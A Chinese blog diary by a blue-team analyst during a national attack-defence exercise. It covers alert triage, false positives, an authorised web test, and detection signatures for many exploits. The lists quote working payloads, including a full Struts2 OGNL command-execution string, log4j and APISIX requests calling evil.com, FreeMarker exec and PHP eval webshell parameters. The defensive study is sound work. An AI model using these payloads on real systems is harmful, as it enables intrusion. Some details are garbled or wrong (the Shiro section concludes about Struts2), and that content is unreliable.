第一天
闲谈
今年我担任的是一个单位的蓝队中级,用奇安信的天眼,负责分析研判。本来第一次参加国家级HVV挺紧张的,结果得知客户要求我提前入场三四天,所以我在这个单位呆了将近一周,并且还逛了不少景点后,再开始护网就完全不紧张了,毕竟我都用了四天的天眼了,看个流量、封个IP跟他娘的喝水一样。
个人感受
言归正传,今天大早上七点我们就开了动员会,进入最后一波检查两台天眼设备是否正常运行,一切确认无误后,九点正式开始。
刚一开始,便出现了很多IP的信息扫描威胁。他们的威胁情报有共同的特点,就是往往使用同一个IP,进行十几种信息扫描手段,比如nmap、GitHub工具扫描等信息扫描,每种手段触发一个告警,所以在天眼分析平台上,往往出现一两页的十几条相同攻击IP告警、但手段各异的现象。对于这种手段就一个字——封!这种百分之百不可能是误报,不要犹豫直接封,否则他可能进一步扩大扫描面积,封完再看流量包,主打的就是速度战。
到了下午更多的流量告警是一些VPN通信告警,类似于用肉鸡来发送数据包,不过这种都是用的UDP协议而不是TCP协议,所以封了也没用,他只管发包,压根不管你收不收包,完全是老赖行为,我觉得是骚扰蓝队监控的。
还有一个骚扰我一整天的是一个后门漏洞告警,他这个IP将我们这边资产的某个端口都试了一遍,因为这个后门漏洞只要能够脸上这个端口,便可以直接打进来,威胁性很大,但是我们很早之前就把这个端口给关了,怎么扫也没用,但他也是UDP协议,封了还出,最后加白了才不骚扰了。
吃瓜情报
一大早上的就听说深信服又爆0day了,说是什么支付页面有问题,还有更嚣张的,说手里有各个厂商设备的0day,我看了看就数天眼卖的贵,一个0day三十万,我滴妈以后我干脆改行去挖安全设备漏洞吧。不过也可能是忽悠人,坑一些傻子花钱买到假洞。
今天下午听说某个地市的联通出局,让我不仅想起了S2021赛季的真神。不过今年没听说有什么好玩的瓜,无所谓,明天厂商的补给就要到了,嘎嘎炫零食不比瓜好吃?
第二天
个人收获
今天较多的告警流量是一些redis账号暴力破解和sql注入(机器学习),经排查后确认是误报。
Redis全称是REmote DIctionary Server,是一个由 Salvatore Sanfilippo 写的 key-value 存储系统,是跨平台的非关系型数据库。
所以redis账号的作用很大,因此redis账号暴力破解是一个很严重的问题,攻击者可能利用ssrf+redis暴力破解,来获取centos8的shell。但我们这里存在一些特殊状况,准确来说是之前为了将一些redis弱口令账号改强密码,结果导致一些密码遗失,不得不自己爆破自己,着实是一波骚操作。
sql注入(机器学习)误报也见了一天了,sql注入是一种比较常见、比较高危的数据库攻击手段,比如时间盲注、宽字节注入、Cookie注入的等sql注入,本质是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据越俎代庖。我对SQL注入的也很了解,但今天见的天眼报的sql注入的流量包里,我真没见着有什么攻击性,里面多是custom_、select之类的,可能是机器学习只学习了格式和一些关键词,就进行报错了,这需要护网人员有一定的分析能力,熟悉一些漏洞原理和详情。
第三天
个人收获
今天中午吃饭之前,一切还是依旧的风平浪静,结果到了十一点半左右,RT便开始狂轰滥炸了,短短两个小时,打了六千多条告警。我滴妈,每五秒刷新六个IP,就问你怕不怕,而且全是Linux命令执行、config可疑操作等一些操作,攻击的我连饭都没吃,真服了,RT挂着工具打自己去吃饭,弄的我一两个小时疯狂点鼠标。
还想分享一个今天遇到的特殊情况:大约早上两点左右,有四个告警显示我方有两个资产因远程木马操控而失陷,流量包中有一个域名,是www.wlanquna.club,在奇安信的阿瑞斯情报库中显示是恶意域名,不过流量包里还可以找到XFF,从而我们可以找到源IP,经微步分析后,这是一个外国的腾讯云发出的,估计这就是腾讯攻击队自己拿着在国外的服务器来打我们了。不过天眼说的失陷并不是真正的失陷,这跟天眼判定外连IP的内在逻辑相关。天眼判定的攻击IP与受害IP,并不一定就是真的攻击和受害,这是因为天眼经常把发出数据的一方判定为攻击,接受数据的一方判定为受害,这就出现一个问题,发送数据的一方真的一定是攻击方吗?并不一定,比如挖矿行为,攻击者把服务器拿下后,将服务器当作自己的矿机,给自己的电脑挖矿,所以如果能够抓住流量,就可以看到自己的资产,向某个IP发送数据,这样看的话,发送者反而是受害者。
所以我们可以这样理解,天眼中的木马远程操控告警,可能是攻击者将木马通过互联网的方式入侵,木马请求DNS服务器去解析恶意域名,DNS服务器接到请求后,向互联网DNS服务器迭代查询,DNS服务器返回解析结果,终端机获取到可以连接的IP,最后终端机对解析到的IP发送TCP连接,攻击者得知该终端已成功上线。而我们的天眼在终端机对解析到的IP发送TCP连接时,便判定我们的DNS服务器是失陷状态,其实这样并不准确,因为即使终端机发送TCP连接,木马并不能直接让DNS服务器失陷,报失陷太吓人了,当时给客户领导吓坏了。这是我自己的一点理解,可能有些不周到的地方,还请大佬多多指教。
吃瓜情报
果然,之前爆的安恒的运维系统出0day的事情是真的,今天晚上我便看到天眼出现安恒运维审计逻辑漏洞的告警,还好我们这边早早关了这个,不然让人打穿了都不知道。
今天有个瓜是关于会议室的,蛮有意思的。
第四、五天
周六周日,两天告警量加起来不到五千,大多都是误报,我真感觉红队都放假去逛街玩去了。
今天分享的是如何做资产梳理、安全测试、整改加固、安全策略优化、安全意识培训的干货。我在申请到甲方同意后,自己在甲方的网站上进行。
首先,我们不能上来就测试,而是要先在与客户的沟通群里,讲清楚自己的IP和测试的时间,精确到几点几分到几点几分,比如说自己测试时间是12点01分到12点20分,那么到了19分就必须停了。再讲清楚测试的攻击内容,比如攻击方面为sql注入、XSS、文件上传漏洞、csrf漏洞,才能开始。这是项目经理告诉我的,以免在做测试的过程中,别人进行攻击,我们的人误以为是自己人,就不管了的情况。这一步很重要,想给客户做测试的小伙伴一定要记住。
我先用fofa(刚冲了会员)对我们的资产进行扫描,结果发现有三个我们的IP,其中有两个是开发人员之前暴露在外网上的,另一个是正常的业务平台。我都进行访问后发现,外网环境下访问不到那两个开发网站,证明安全,甲方防范意识很好。这一步是排查资产有没有暴露在公网,大多数单位在护网前都会关掉,或者放在内网里让他只能对内使用。
其次,我访问业务的网站,看到很多功能未登录不能用,于是注册了一个账号,注册时发现问题,一个是身份证号和姓名可以填虚假的,我当时填姓名是测试,身份证号是网上随机生成的,然后注册成功了,说明他没有检验姓名和身份证号,只需要符合几个基本的条件即可,这个事情有点问题,因为如此一来攻击者注册一个身份证号、姓名、手机号(用接码平台的手机号)都是假的的账号就太容易了,为以后溯源埋下小隐患,但是甲方觉得无所谓,不必要再去添加检验。第二个事情是爆破问题,因为在登录页面没有验证码,即使输错了多次也没有验证码出现,这为爆破密码又埋下隐患,甲方觉得也问题不大,出现爆破了封IP就完了。行吧,你甲方你说了算(小声bb)。这一步是提醒甲方进行整改加固。
然后,我注册好账号进来后,翻了翻页面,试了很多漏洞攻击,都无效。觉得问题不大,没有明显的注入点。但是看到有个“客服交流”的页面,想试试在评论区发XSS的效果。所以先试<script>alert(1)</script>,在尝试后发现无弹窗,又从XSS平台上尝试一些更高级的XSS语句,也是没有效果。但是事后从客户那边看到我自己的评论内容,发现<>的符号被过滤了,但括号和反斜杠,以及script和alert都没有被过滤,说明有可能用<>的url编码或者ASCII码来尝试成功的可能,可惜当时事后因为客户没再让我做测试,所以没再尝试。这一步是做安全测试,检测是否存在一些web漏洞,比如sql注入、xss、文件上传漏洞等漏洞的可能。
随后,我结束攻击准备进行测试总结发群里时,发现客户那边给我们打来电话,说客服把一个用户的评论,什么script啊,什么alert啊,看了之后没有看懂,干脆就把这个评论直接转发给内部人员了,内部人员看到xss吓了一跳,还好因为过滤了<>所以没生效,但这也给我们提了个醒,就是攻击者如果把一段攻击有效的XSS写在评论区,客服因为看不懂就转发给内部人员,这样极有可能导致中招,从而被打一系列的组合拳,所以这件事情我们知道后,给客服做了安全意识培训,让他们不知道的链接和代码啥的,别点也别转发,叫人过去看看再说;宣讲钓鱼邮件防范,个人不使用弱密码,安装杀软等等等。这一步做的就是人员的安全意识培训。
最后,做好这一系列工作后,千万别忘了总结,把这个过程和结果给客户做出一段文字发过去,并把自己做的事情说清楚,不要有遗漏,比如评论区留言那件事不能忘了。结尾做个升华,比如说攻击均被天眼检测到。我记得我当时加上这句话后,项目经历看到后夸我半天。
第六-九天
这两天也没啥大事,就是攻击队来回的扫,非常烦,但是拿他们一点办法没有,我们这边就一个分析研判带俩监控,拿头去溯源??
所以这几天从csdn、博客园、以及Claude人工智能那里整理了整理代码执行常见的几个漏洞流量特征,供大家借鉴。
疑难代码执行漏洞流量特征
(1)log4j2远程代码执行漏洞(CVE-2021-44228)
log4j2远程代码执行漏洞(CVE-2021-44228)的典型流量特征主要包括:
1.请求中包含特殊的 ${jndi:[ldap://或者](ldap://或者)${jndi:rmi://等字符串,是造成漏洞的关键。
2.JNDILookup类在请求时被频繁访问。
3.看到大量LDAP、RMI等非HTTP请求。
4.请求中包含莫名其妙的长字符串作为参数,例如X-Api-Version: ${jndi:rmi://evil.com/exp}
5.访问一些正常情况下不会频繁。访问的类,如com/sun/jndi/rmi/registry/RegistryContext.class等。
6.请求参数中包含可以触发漏洞的键值,如searchValue、name、value等。
7.请求很快就返回,没有正常的业务逻辑处理。
8.返回响应包包含了异常信息,如java.naming.NameNotFoundException等。
9.访问或探测一些不正常的端口,如LDAP服务的389端口等。
10.看到反序列化参数数据。
如果流量中出现这些特征,需要高度关注,很可能存在log4j2远程代码执行漏洞的利用或攻击行为。应立即检查log4j2版本并更新补丁,避免造成更大危害。
(2)IBM Rational Quality Manager 信任管理漏洞(CVE-2022-48917)
IBM Rational Quality Manager以及Rational Test Lab Manager中的tomcat服务器存在一个默认的管理员账号密码。远程攻击者更容易通过利用对管理员身份的访问执行任意代码。
1.请求头中包含 GET /manager/html HTTP/1.1
2.漏洞利用会发送大量HTTP请求,包含伪造的“qmadmin” cookie。
3.请求头中包含Authorization:Basic QURNSU46QURNSU4
4.请求中可能包含长字符串绕过WAF等防护的特征。
(3)VMware View Planner 远程代码执行漏洞(CVE-2021-21978)
VMware 是一家云基础架构和移动商务解决方案厂商,View Planner 是他旗下推出的一款针对view桌面的测试工具。2021年03月02日,VMware 官方披露了 CVE-2021-21978 VMware View Planner 远程代码执行漏洞。影响版本为vmware:view_planner: 4.6
VMware View Planner 的 web 上传接口中itrLogPath参数未进行严格的校验,允许攻击者实施目录穿越,将文件上传至任意目录。
View Planner 在处理上传文件时,允许攻击者上传文件至任意目录,攻击者通过构造请求实现远程代码执行,从而控制服务器。
1.请求头包含POST/logupload?logMetaData+{"itrLogPath":"../../../../../etc/httpd/"}
2.请求体里包含Content-Disposition:form-data;name="logfile";filename=""
3.请求中包含 ${java:runtime} 等代码执行有效载荷。
4.访问 View Planner 管理界面端口 8443,发送可疑请求数据包。
(4)PHP代码执行攻击
1.请求参数中包含eval()、assert()、include()、require()等函数调用。
2.参数中含有 base64 编码的字符串,可疑解码后是代码片段。
3.求包含类似${@eval($_POST[1])}这样的代码执行payload。
4.参数中包含php://input/php://filter等请求输入流过滤函数。
5.请求包含不合法和超长的参数,可能藏匿恶意代码。
6.响应中包含系统路径泄露,执行结果等信息。
7.访问正常情况下不会频繁请求的PHP文件或方法。
8.请求都被指向统一的入口文件,如index.php等。
9.存在源IP访问与系统响应严重不对称的情况。
10.访问含有已知漏洞的PHP版本或组件。
11.PHP进程CPU和内存使用异常增高。
如果出现这些特征,说明存在PHP远程代码执行漏洞攻击的可能,需要检查PHP环境安全配置,及时打补丁防范攻击。
(5)Apache Struts2框架安全漏洞
1.请求体中出现,exec(''),含Struts2常见参数如action、method、classname等。
2.请求中含有OGNL表达式,如%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#memberAccess?(#memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
3.请求中有不合法的Content-Type,如application/x-www-form-urlencoded。
4.请求参数中含有不合法的方法调用,如action::(),method::()等。
5.返回响应包含系统敏感信息。
(6)HTTP协议栈远程代码执行漏洞
HTTP协议栈远程代码执行漏洞通常是指操作系统或软件HTTP解析模块中存在可被远程利用的代码执行漏洞。
典型的流量特征包括:
1.请求中包含精心构造的不规范HTTP请求,如多个空行、异常长的头字段等。
2.利用分块编码发送数据,碰撞出缓冲区溢出。或提交超长的URL以触发堆栈溢出。
3.恶意请求导致HTTP进程崩溃。
4.返回响应包含系统内存内容。
5.访问服务器异常卡顿,服务临时不可用。
6.HTTP流量中可能包含反向shell等后渗透特征。
因此,发现HTTP协议栈漏洞攻击时,应立即针对漏洞路径和攻击源主机进行访问控制,尽快修补漏洞防止进一步渗透。
(7)Jenkins远程代码执行(CVE-2019-1003000)
Jenkins有一个在Groovy中实现Pipeline功能,漏洞利用作者发现用户未发出身份验证的GET请求,以提供Groovy元编程输入,最终造成远程代码执行漏洞。
1.访问Jenkins脚本控制台端口(默认 8080)
2.请求体中包含精心构造的恶意Groovy或Java代码
3.请求包含特定的“x-jelly” HTTP头
4.提交的代码以多层编码方式绕过检测
5.代码中可能包含反弹shell、文件读取写入等可疑操作
6.反复尝试提交不同的代码以测试执行效果、
7.返回响应中可能包含异常信息和系统路径泄露
8.回连网站管理员未授权的端口或地址
9.Jenkins进程CPU和内存消耗突然增高
如果发现这些可疑流量,说明Jenkins很可能受到该漏洞的攻击,应立即检查更新补丁,切断攻击session,进行源IP隔离等操作。
(8)Fastjson反序列化漏洞攻击(通用)
阿里Fastjson存在反序列化漏洞,由于修补方式采取白名单方式,导致不断有新的方式绕过黑名单。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器,甚至植入webs hell,严重危害主机安全。
1.请求体中包含精心构造的JSON数据,数据大小通常比较大。
2.JSON数据中存在嵌套调用了readObject/writeObject等方法。
3.存在类似BadAttributeValueExpException等反序列化异常信息。
4.JSON数据包含不合法的类型转换,如ArrayList转换为InvocationHandler。
5.包含非预期的类如com.sun.rowset.JdbcRowSetImpl等。
6.请求中有明显的payload签名,如rO0ABXNyAB。
7.重复利用这一类型漏洞进行攻击请求。大约二十条
如果观察到这些可疑迹象,则表明Fastjson可能正在遭受反序列化漏洞的利用和攻击。
(9)Apache Shiro<=1.2.4反序列化漏洞攻击
Apache Shiro<=1.2.4中使用AES硬编码密钥,存在严重的反序列化漏洞,攻击者可以在远程主机上执行任意指令。通常情况下,远程代码执行漏洞包括URL、Post请求;构造特定的HTTP请求;利用一些框架底层的安全漏洞,执行任意代码;
1.请求中包含精心构造的反序列化payload,可indentified通过特定开头标识。
2.尝试访问默认的Shiro endpoint,如/shiro-web。
3.攻击请求中包含反序列化参数,如rememberMe。
4.反序列化对象含有恶意类,如CommonsBeanutilsBean、JRMPListener等。
5.反序列化载荷中包含明显的恶意命令执行代码。
6.成功反序列化后回连非法地址或端口。
7.返回响应包含执行结果,或敏感路径被泄露。
8。存在重复利用该漏洞的攻击请求
9.尝试绕过WAF等防御访问Shiro端点。
如果出现这些特征,说明Struts2可能存在被利用的风险,应立即检查框架版本并打补丁防范攻击。
第十天
今天我不好意思在客户和项目上的兄弟的面前骂,到了网上我必须开骂了。
今早上我照常七点到岗,由于我是十二小时,另外两个兄弟都是八小时,所以我陪前一个人陪两个小时,陪后面一个人陪两个小时。而今早上到的时候看见这个兄弟在玩手机刷视频,刷视频就算了,我问他有没有什么情况,他看着视频跟我说没有,结果过了一小会,我在天眼上看看今早上两点的告警,我看到相同一个IP打了七百条攻击,有三个显示攻击成功的告警,我问他这三个是什么情况,他跟我说他不知道,没看见。可给我气着了。
我连忙看了看是什么告警,结果发现一个是弱口令,对方用工具扫描出了我们服务器里面的一个用户名为user,密码为123456的账号,疑似管理员账号;另一个告警是springboot Actuator未授权访问的漏洞,访问流量包里的域名,疑似能泄露敏感配置文件。
所以我立马上报值班的客户领导,攻击者是两点半攻击的,IP地址为北京,是攻击队的扫描的概率非常大,而攻击队必须八点才能发起攻击,否则会扣分,当时已经七点半了,所以我们急需解决这两个问题,否则可能出大问题。一方面,让系统的人去查服务器上有没有user账号,有的话该改密码改密码。另一方面,让开发组去及时关掉那个springboot的业务,然后我在这段期间复现一下看看springboot Actuator未授权访问的问题。
根据流量包里包含的漏洞链接发现网络地址是一个http://xxx/xxx/actuator的网址,点开后便是一个显示IP地址和value的页面,既然能访问到,所以我就不敢保证有没有可能让攻击者访问到一些配置文件了。网上有文章讲了如何利用springboot Actuator未授权访问漏洞,比如访问/trace端点获取到近期服务器收到的请求信息。如果存在登录用户的操作请求,可以伪造cookie进行登录, 这里暴露出redis的地址和端口,连接一下redis,redis存在未授权访问漏洞,可以查看redis的数据。
(取自他人的图片)
第十一-十四天
第十一、十二天是周末,流量异常少,主打的就是划水。
第十三、十四天做了一些漏洞整理。如下
1.代码执行流量特征
(1)锐捷网管系统远程代码执行漏洞
锐捷cms存在远程代码执行漏洞,攻击者可以利用漏洞在目标系统上执行任意代码,而官方暂未对该漏洞进行修复。
1.访问网管系统特定的CGI路径,例如/app/aps/speedtest/index.php或/app/aps/wips/reportfile/delete.php等。这些路径对应的功能容易被利用执行代码。
2.携带的payload包含eval、assert、system、passthru等危险函数调用,以及反弹shell代码等。这是执行代码的常见方式。
3.请求中包含不正常的User-Agent或其他头信息,例如mozilla/5.0 (compatible; trojan/1.0)。这可能是攻击者的标志。
4.上传文件或POST较长的数据包,包含myfile.php或.jpg/.gif后门文件。文件上传是一种常见的getshell方式。
5.攻击成功后,熟悉的反弹shell流量,例如访问两次/1.jpg间隔几秒,含有base64编码的命令执行结果等。
6.成功控制服务器后,从服务器到外部地址的异常连接,例如SSH连接到攻击者的服务器等。
当观察到这些可疑流量时,需要提高警惕,检查服务器是否已被入侵控制。同时检查网管系统版本并及时打补丁,避免受到利用。
(2)蓝凌OA s_bean参数远程代码执行漏洞
蓝凌OA s_bean参数存在远程代码执行漏洞,攻击者可以通过特定请求包获得服务器权限。
1.请求体为Unicode编码,以s_bean=,script=为开头
2.在请求参数中包含s_bean,其值可能为反弹shell代码,例如:
s_bean=@eval($_POST[1]);
3.POST请求中包含执行代码的1参数,例如反弹shell代码:
1=phpinfo();
4.攻击成功后,访问特定页面触发反弹shell,页面可能是/1.jpg 或其他动态页面。
5.如果成功控制服务器,还可能见到从蓝凌OA服务器发出的反向连接,连接到攻击者控制的服务器。
6.也可能上传包含后门的文件,例如上传 id.php 后门。
7.入侵后可能修改蓝凌OA配置、添加新管理员账号等行为。
8.攻击请求包含特殊的User-Agent或其他可疑标志。
防范此漏洞,应及时更新蓝凌OA到最新版本,或阻断包含s_bean参数的可疑请求。观察这些流量特征,可以检测或确认蓝凌OA是否遭到利用。
(3)畅捷通 T+ 远程代码执行漏洞
畅捷通 T+ 存在任意文件写入漏洞,攻击者通过该漏洞向服务器写入可执行脚本,从而拿到服务器的管理权限。
1.访问畅捷通T+ /Router/script 路径,这是漏洞存在的接口。请求体里包含了要上传的文件,比如jpg等
2.携带cmd参数,其值为要执行的系统命令,例如cmd=whoami 等。
3.成功执行命令后,返回内容包含命令执行结果。
4.攻击者也可能执行反弹shell命令,在其他监听端口接收回连接。
5.入侵成功后,可能从畅捷通服务器发出到攻击者控制服务器的连接。
6.上传包含后门的Web shell,如文件muma.jsp,并访问该文件异地执行代码。
7.攻击请求可能包含特殊的User-Agent或其他信息作为标志。
8.成功控制服务器后,可能修改畅捷通配置,增加新管理员账号等。
9.尝试遍历、扫描畅捷通的其他接口或目录进行进一步的攻击渗透。
防范此漏洞,重点监控对/Router/script接口的请求,检测疑似攻击的流量特征,并检查畅捷通T+系统的安全状态。及时打补丁升级也是关键的预防措施。
(4)Apache APISIX远程任意代码执行漏洞
1.访问 APISIX 管理端口,通常是 9080、9180 等端口。
2.在请求中包含特定参数,如用于模板渲染的库参数,例如:
PATCH /apisix/v1/services?library=http://evil.com/hack
3.evil.com 是恶意网站,包含了攻击payload。
4.Payload 可能包含获取目标服务器信息、下载执行恶意文件等代码。
5.返回响应中可能包含页面模板引擎错误信息。
6.攻击成功后,目标服务器会访问恶意站点 evil.com 并发送请求。
7.目标服务器还可能向外部发送网络请求,连接到攻击者控制的服务器。
8.入侵成功后可能再攻击内网其他资产,产生内网横向渗透流量。
9.检测到目标服务器运行异常进程或新建可疑文件。
10.管理界面出现新增的管理员账户或其他可疑修改配置的情况。
综上所述,如检测到包含特殊参数、连接到恶意站点等可疑请求,需要高度关注是否存在利用 APISIX 远程代码执行漏洞的风险。
(5)FreeMarker表达式注入漏洞
可以通过free marker注入和上传freemark文件,后台如果能成功解析,将会导致命令执行。
1.请求参数中包含 {...} 表达式,例如 {7*7} 等。
2.表达式内容可能执行系统命令,如 ${T(java.lang.Runtime).getRuntime().exec("calc.exe")}
3.也可能包含反射调用恶意方法,如 ${class.getMethod("危险方法").invoke()}
4.请求源为未知或可疑的IP地址。
5.User-Agent等头信息可能异常,包含攻击标志。
6.攻击成功后可能在响应中包含系统命令输出,或错误信息。
7.服务器出现访问恶意站点或下载可疑文件的网络流量。
8.检测到目标服务器运行新建的异步进程或线程。
9.服务器目录出现新的可执行文件或jar包等。
10.Web日志中出现大量语法错误,对应的源都是可疑IP。
11.管理后台出现修改管理员账户、添加网站后门等情况。
12.存在横向渗透的流量,如目标服务器扫描访问内网其他资产等。
包含FreeMarker表达式的非预期请求,尤其来自可疑IP的,都需要提高关注,有可能是在尝试表达式注入漏洞。
2.信息泄露流量特征
(1)发现扫描工具-zgrab
Zgrab是一款使用go语言编写的基于Zmap无状态扫描的应用层扫描器,可以自定义数据包以及ip、domain之间的关联。可以用于快速指纹识别爆破等场景,最新的Zgrab已经替代了zgrab。
他的流量特征是UA头里出现明显的zgrab字样
(2)发现扫描工具-Nmap
Nmap是一个网络连接端扫描软件,用于扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。他是网络管理员必用的软件之一,以及用于评估网络系统安全。正如大多数被用于网络安全的工具,Nmap也是不少黑客和骇客爱用的工具。系统管理员可以利用Nmap来探测工作环境中未经批准的服务器,但黑客会利用Nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap常被评估系统漏洞软件Nessus混为一谈。Nmap以隐秘的手法避开闯入检测系统的监控,尽可能地不影响目标系统的日常操作。
他的流量特征是:
1.请求头中出现GET /nice port/Trinity.txt bak
2.如果是SMB,则载荷内容中出现Nmap1.0
(3)发现扫描工具-Masscan
Masscan号称是最快的互联网端口扫描器,最快可以在六分钟内扫遍互联网。
masscan的扫描结果类似于nmap(一个很著名的端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了异步传输的方式。它和这些扫描器最主要的区别是,它比这些扫描器更快。而且,masscan更加灵活,它允许自定义任意的地址范和端口范围。
他的流量特征是:请求头内包含了Masscan
第十五天
最后一天情况层出不穷,大早上的就一波一波的攻击,而且世界各地的人民都有,有韩国的、美国的、日本的、德国的,还有什么罗马尼亚、比利时的就离谱,不过这些攻击最后都被化解,没造成杀伤性。我估计是攻击队最后一天报复社会的打击行为。
攻击里面有些流量包返回200,所以需要验证攻击是否生效,比如sql注入(时间盲注),但从返回体来看是正常回显了,但是因为时间盲注侧重点是在是否页面有延时回显上,所以我去找客户授权然后验证了一下,结果是时间盲注失效,立即回显。没想到就这么简单的一个小测试,给客户带来小震撼,客户领导看我都顺眼了。
下午长亭的设备出了个事件,有两台客服的电脑在中午十二点多对域控发起攻击,告警类型是Samba认证。这个时间正是客服人员去吃饭的时间。这个事件在当时掀起轩然大波,首先怀疑的就是两台机子已被拿下,所以先给他拔了网线,防止扩散,再去排查情况。最后发现电脑里面也没有可疑的进程,再看了看流量包发现是误判,闹了一场乌龙。
HVV总结
无尽征程漫漫。经过十五天的高强度攻防对抗后,回头再看发现时间过得也很快。
第十一天正好是我的生日,第一次生日在北京过,不过我没敢告诉客户和项目上的其他人,只是自己在朋友圈发了个“保持热爱,满怀期待”,再在微步社区发了一个感慨,但没想到社区内有那么多的好兄弟们纷纷发来祝福。这事让我特别感动,感受到人在异乡的温暖,感受到人生处处充满阳光。也许这就是网安的魅力吧。
(完)
540
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
